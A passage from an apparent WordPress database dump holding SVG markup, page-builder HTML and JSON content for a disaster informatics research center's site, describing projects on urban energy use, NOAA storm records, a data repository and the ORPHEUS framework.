1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h35\" class=\"h-x-container style-864 style-local-22-h35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h35-group style-864-spacing style-local-22-h35-spacing\"><span class=\"h-button__outer style-865-outer style-local-22-h36-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/?page_id=126\"  data-colibri-id=\"22-h36\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-865 style-local-22-h36 position-relative\"><!----><!----> <span>learn more</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h29-outer\">\n            <div data-colibri-id=\"22-h29\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h29 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h30\" class=\"d-block style-221 style-local-22-h30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h30-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h30-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',22,'https://gsudice.dataconn.net/?p=1436',0,'revision','',0),(1442,1,'2023-09-29 10:29:30','2023-09-29 14:29:30','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 